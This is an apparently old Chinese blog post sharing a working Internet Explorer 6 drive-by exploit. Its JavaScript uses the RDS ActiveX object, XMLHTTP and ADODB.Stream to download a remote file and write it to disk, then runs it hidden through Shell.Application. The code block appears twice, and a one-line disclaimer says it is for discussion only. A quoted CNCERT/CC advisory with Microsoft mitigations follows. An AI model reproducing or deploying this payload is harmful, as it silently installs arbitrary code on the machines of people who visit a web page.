因为一些个人的原因好久没有写技术的blog了
最近看到了一个可以用ie的漏洞攻击的办法。在ie 6.0上有效
挺简单的。就是在网页上嵌入一段javascript代码,如果安全权限低的话。可以从网上下载一段文件
到本地执行。。。呵呵。可是想做什么就做什么了....
关于着漏洞的介绍
http://bbs.54master.com/redirect.php?fid=14&tid=122758&goto=nextoldset
(仅是技术讨论,不应该用于其它的目的)
var
url,path;
url = " XXXXXXXXXXXXXXXX " ; // 需要下载的文件
path = " KKKKKKKKK " ; // 保存在本地的路径
var ado = (document.createElement( " object " ));
var d = 1 ;
ado.setAttribute( " classid " , " clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 " );
var e = 1 ;
var xml = ado.CreateObject( " Microsoft.XMLHTTP " , "" );
var ab = " Adodb. " ;
var cd = " Stream " ;
xml.Open( " GET " ,url, 0 );
xml.Send(); // 创建xmlhttp下载
var as = ado.createobject(ab + cd, "" );
as.type = 1 ;
var n = 1 ;
as.open();
as.write(xml.responseBody);
as.savetofile(path, 2 ); // 保存到硬盘
as.close();
var shell = ado.createobject( " Shell.Application " , "" );
shell.ShellExecute( " D:/Downloads/qq2006beta3_PConline.exe " , "" , "" , " open " , 0 ); // 执行保存到硬盘的文件
url = " XXXXXXXXXXXXXXXX " ; // 需要下载的文件
path = " KKKKKKKKK " ; // 保存在本地的路径
var ado = (document.createElement( " object " ));
var d = 1 ;
ado.setAttribute( " classid " , " clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 " );
var e = 1 ;
var xml = ado.CreateObject( " Microsoft.XMLHTTP " , "" );
var ab = " Adodb. " ;
var cd = " Stream " ;
xml.Open( " GET " ,url, 0 );
xml.Send(); // 创建xmlhttp下载
var as = ado.createobject(ab + cd, "" );
as.type = 1 ;
var n = 1 ;
as.open();
as.write(xml.responseBody);
as.savetofile(path, 2 ); // 保存到硬盘
as.close();
var shell = ado.createobject( " Shell.Application " , "" );
shell.ShellExecute( " D:/Downloads/qq2006beta3_PConline.exe " , "" , "" , " open " , 0 ); // 执行保存到硬盘的文件
安全公告CN-SA04-34A
发布日期:2004-7-15
安全等级:三级
公开程度:公共
更新说明:
对于近期众所周知的IE漏洞,微软一直未提供补丁,即使在7月份最新的一批安全公告中也没有。但是,微软提供了两个更新方案能够有效降低ADODB.Stream或Shell.Application被用来运行恶意代码的危险。据分析,要成功利用IE漏洞需要IE调用ADODB.Stream或Shell.Application程序。
防止ADODB.Stream被IE调用的解决方案:
这是一个简单的注册表修改程序,能够有效地防止Download.Ject的运行。[下载]
另外,微软提供了Download.Ject清除工具。[下载]
防止Shell.Application被IE调用的解决方案:
除了利用ADODB.Stream运行Download.Ject,调用Shell.Application也能获得同样的效果。因此,微软提供了Windows Shell更新方案。
http://www.microsoft.com/china/technet/Security/bulletin/ms04-024.mspx
上面的更新方案会更改一些系统功能,除了安全公告中提到的以外,还有以下功能更改:
针对Internet Explorer 6 Service Pack 1,它可以防止位于Internet区的浏览用户去本机区访问下载网页。该更改能够降低潜在的新的跨域漏洞的影响,进一步加强了对Internet Explorer 6 Service Pack 1的限制。
限制Shell Automation Service ActiveX控件(shell.application)的功能,安全性得以提高,能够防止潜在的恶意利用。微软认为其是一种深度防御措施。
微软推荐,在XP SP2发布之前,用户使用非XP SP2版本的IE需要采取以下措施提高IE的安全性:
1. 加固本机区(参考 http://support.microsoft.com/default.aspx?scid=KB;EN-US;833633)
2. 安装最新的Outlook Express更新(MS04-018)
3. 使用上面的ADODB.Stream修改程序
4. 安装安全更新(MS04-024)
参考信息:
其他信息:
CVE编号:CAN-2004-0549
首次发布日期:2004-7-15
修订次数:0
安全公告文档编写:
CNCERT/CC